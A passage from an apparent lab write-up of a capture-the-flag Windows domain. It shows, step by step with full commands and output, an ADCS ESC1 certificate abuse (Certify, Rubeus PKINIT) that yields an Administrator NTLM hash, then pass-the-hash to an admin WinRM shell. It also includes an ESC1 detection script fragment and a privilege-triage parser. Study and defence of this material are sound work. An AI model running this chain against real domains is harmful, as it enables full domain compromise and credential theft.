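        print(f"{t.name} ({t.ca}): {'ESC1' if is_esc1(t) else 'not ESC1'}")
        for reason in esc1_findings(t):
            print("  -", reason)
```

The hardened variant still reports two of the five conditions (an authentication EKU and zero signatures), which is normal for a user-authentication template; what closes the hole is that the CA, not the enrollee, builds the SAN from the directory, that every request waits for manager approval, and that Domain Users no longer hold enrollment rights.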

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 12

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----[SNIP]-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----[SNIP]-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:03.7660303

Now that we have the private key and the certificate, let’s bundle them into a single PFX file. Run the command Certify printed to convert the PEM to PFX:

🔥\> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:

Set an export password; it will be used in the next step. Upload the PFX file.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload cert.pfx
Info: Uploading cert.pfx to C:\Users\Ryan.Cooper\Documents\cert.pfx


Data: 4564 bytes of 4564 bytes copied

Info: Upload successful!

Upload the Rubeus.exe binary to the target and use the certificate to request a TGT for Administrator via PKINIT (the /password value is the PFX export password set in the previous step).

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:12345 /ptt /getcredentials

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):

[+] Ticket successfully imported!

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  Administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  3/5/2023 9:28:00 AM
  EndTime                  :  3/5/2023 7:28:00 PM
  RenewTill                :  3/12/2023 10:28:00 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  zh2bUJz9yA4JqeInN3AgwQ==
  ASREP (key)              :  D116C4E4A154340E7D1A598B92B471C1

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : A52F78E4C751E5F5E17E1E9F3E58F4EE

Now that we have the Administrator NTLM hash, we can pass the hash to obtain a shell over WinRM.

🔥\> evil-winrm -i sequel.htb -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE

Evil-WinRM shell v3.4

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

We have successfully rooted the machine.
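For triaging a session like the one above, a small parser for the fixed-width `whoami /priv` table that flags enabled high-impact privileges is handy. This is an added example, not code from the write-up or any tool it uses; the HIGH_IMPACT set is an illustrative selection and the sample table is constructed in the same layout as the output above.

```python
import re
from typing import Dict, List

# Privileges whose "Enabled" state on a token deserves a closer look in triage.
# Illustrative selection for this write-up, not an exhaustive list.
HIGH_IMPACT = {
    "SeDebugPrivilege", "SeImpersonatePrivilege", "SeBackupPrivilege",
    "SeRestorePrivilege", "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege",
    "SeEnableDelegationPrivilege", "SeManageVolumePrivilege",
}

def parse_whoami_priv(text: str) -> List[Dict[str, str]]:
    """Parse the fixed-width table printed by `whoami /priv`.

    Column boundaries are taken from the '=====' ruler under the header, so a
    description that itself contains several spaces is not split by accident.
    """
    lines = text.splitlines()
    ruler = next((i for i, l in enumerate(lines)
                  if re.fullmatch(r"=+(?: +=+)+ *", l)), None)
    if ruler is None or ruler == 0:
        raise ValueError("whoami /priv column ruler not found")
    spans = [(m.start(), m.end()) for m in re.finditer(r"=+", lines[ruler])]
    names = [lines[ruler - 1][s:e].strip() for s, e in spans]
    rows = []
    for line in lines[ruler + 1:]:
        if not line.strip():
            continue
        cells = [line[s:e].strip() for s, e in spans[:-1]]
        cells.append(line[spans[-1][0]:].strip())  # last column may run long
        rows.append(dict(zip(names, cells)))
    return rows

def enabled_high_impact(text: str) -> List[str]:
    """Sorted names of enabled privileges that are in HIGH_IMPACT."""
    return sorted(r["Privilege Name"] for r in parse_whoami_priv(text)
                  if r["State"] == "Enabled" and r["Privilege Name"] in HIGH_IMPACT)

# Constructed sample in the same layout as the session above; column widths are
# chosen for the sample, and SeBackupPrivilege is Disabled to exercise the filter.
_ROWS = [
    ("SeDebugPrivilege", "Debug programs", "Enabled"),
    ("SeChangeNotifyPrivilege", "Bypass traverse checking", "Enabled"),
    ("SeImpersonatePrivilege", "Impersonate a client after authentication", "Enabled"),
    ("SeBackupPrivilege", "Back up files and directories", "Disabled"),
]
SAMPLE = "\n".join(
    ["PRIVILEGES INFORMATION", "-" * 22, "",
     f"{'Privilege Name':<25} {'Description':<42} State",
     f"{'=' * 25} {'=' * 42} {'=' * 8}"]
    + [f"{n:<25} {d:<42} {s}" for n, d, s in _ROWS]
)

if __name__ == "__main__":
    print(enabled_high_impact(SAMPLE))  # ['SeDebugPrivilege', 'SeImpersonatePrivilege']
```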
